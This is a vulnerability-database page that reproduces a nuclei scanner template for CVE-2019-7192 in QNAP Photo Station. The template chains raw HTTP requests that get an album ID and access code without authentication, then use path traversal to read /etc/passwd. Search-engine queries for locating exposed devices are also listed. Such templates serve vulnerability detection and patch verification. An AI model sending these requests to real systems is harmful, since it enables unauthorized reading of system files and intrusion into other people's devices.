Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

QNAP QTS and Photo Station 6.0.3 - Remote Command Execution

πŸ—“οΈΒ 16 Jun 2026Β 07:13:51Reported byΒ ProjectDiscoveryTypeΒ 
nuclei
Β nucleiπŸ”—Β github.comπŸ‘Β 73Β Views

QNAP QTS Photo Station 6.0.3 Remote Command Execution, unauthorized access, update recommende

Related
Refs
Code
ReporterTitlePublishedViews
Family
0daydb		QNAP QTS And Photo Station 6.0.3 - Remote Command Execution
30 May 202014:56
–0daydb
0day.today		QNAP QTS and Photo Station 6.0.3 - Remote Command Execution Exploit
29 May 202000:00
–zdt
GithubExploit		Exploit for Incorrect Authorization in Qnap Photo_Station
21 May 202009:14
–githubexploit
GithubExploit		Exploit for CVE-2022-2546
19 Sep 202414:05
–githubexploit
GithubExploit		Exploit for Incorrect Authorization in Qnap Photo_Station
24 May 202015:44
–githubexploit
ICS		People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices
10 Jun 202212:00
–ics
ATTACKERKB		CVE-2019-7192
5 Dec 201900:00
–attackerkb
BDU FSTEC		The vulnerability of the Photo Station photo storage application, related to privilege management errors, allows a intruder to gain unauthorized access to the system.
7 Sep 202100:00
–bdu_fstec
Circl		CVE-2019-7192
20 May 202014:15
–circl
Circl		CVE-2022-2546
2 Feb 202312:14
–circl
Rows per page
id: CVE-2019-7192

info:
  name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7192
    - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
    - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7192
    cwe-id: CWE-863
    epss-score: 0.88213
    epss-percentile: 0.99747
    cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: qnap
    product: photo_station
    shodan-query:
      - 'Content-Length: 580 "http server 1.0"'
      - http.title:"photo station"
      - http.title:"qnap"
      - 'content-length: 580 "http server 1.0"'
    fofa-query:
      - title="photo station"
      - title="qnap"
    google-query:
      - intitle:"qnap"
      - intitle:"photo station"
  tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss,vkev,vuln

http:
  - raw:
      - |
        POST /photo/p/api/album.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=setSlideshow&f=qsamplealbum
      - |
        GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        POST /photo/p/api/video.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "admin:.*:0:0:"

      - type: word
        part: header_3
        words:
          - video/subtitle

      - type: status
        part: header_3
        status:
          - 200

    extractors:
      - type: regex
        name: album_id
        part: body_1
        group: 1
        regex:
          - '<output>([a-zA-Z]+)<\/output>'
        internal: true

      - type: regex
        name: access_code
        part: body_2
        group: 1
        regex:
          - encodeURIComponent\('([A-Za-z0-9]+)'\)
        internal: true
# digest: 4a0a0047304502206dcb40eb247d64901e5fd72ce7fca3e5f210dcbada38e7e6ad9060877d8250c8022100f74ac508227414b037858e805919dfbef9637361b27fd3d9142dd86322afdff9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 27.5
CVSS 3.19.8
EPSS0.88213
SSVC
cvecve2019packetstormlfircekevqnapqtsxssimproperaccesscontrolvulnerabilityremotecommandexecutionsecuritypatchupgraderecommendedexploitation
73